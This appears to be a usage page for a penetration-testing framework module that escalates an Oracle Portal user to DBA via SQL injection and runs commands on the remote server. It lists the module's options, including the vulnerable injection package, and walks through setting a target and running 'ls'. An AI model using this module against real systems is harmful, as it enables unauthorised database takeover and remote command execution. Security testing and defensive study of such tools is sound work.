-
Notifications
You must be signed in to change notification settings - Fork 29
auxiliary scanners oracle_portal_runcmd
CG [carnal0wnage]
Oracle Portal Privilege Escalation. Tries various privilege escalation exploits against oracle portal's that are vulnerable to sql injection in an attempt to escalate the current portal user to DBA
http://www.owasp.org/index.php/Testing_for_Oracle
COMMAND ipconfig true The command to run
DAD portal/ true The Database Access Descriptor
INJECTION PORTAL.WWV_HTP.CENTERCLOSE true The vulnerable injection package
JAVASETUP true true Set up java libs and command function
PROXYA false Proxy IP Address
PROXYP false Proxy Port Number
RURL http://www.example.com/test.php true Target address
URIPATH /pls/ true The URI PATH
VERIFY true true Verify URL and DBA Status
INJECTION -- Vulnerable Injection Package
URIPATH -- Path (before portal).
DAD -- The DAD can change per-site depending on what they've named it OR if they've left the default DAD in. Either way, change if necessary.
VERIFY -- If set to true, will verify URL & DBA status
JAVASETUP -- Inject Java specific commands
COMMAND -- The command you'd like to run on the remote server
Our target is http://vulnoraclesappisembarassingitself.com and it has a DAD at portal. Leave the default setting. If changing, append the '/' after the name change. Example, if changing from portal to portal30,
set DAD portal30/
The same applies for pls only prepend and append. Example,
set URIPATH /expls/
We'd like to run the command 'ls'
set COMMAND ls
set RURL http://vulnoraclesappisembarassingitself.com
run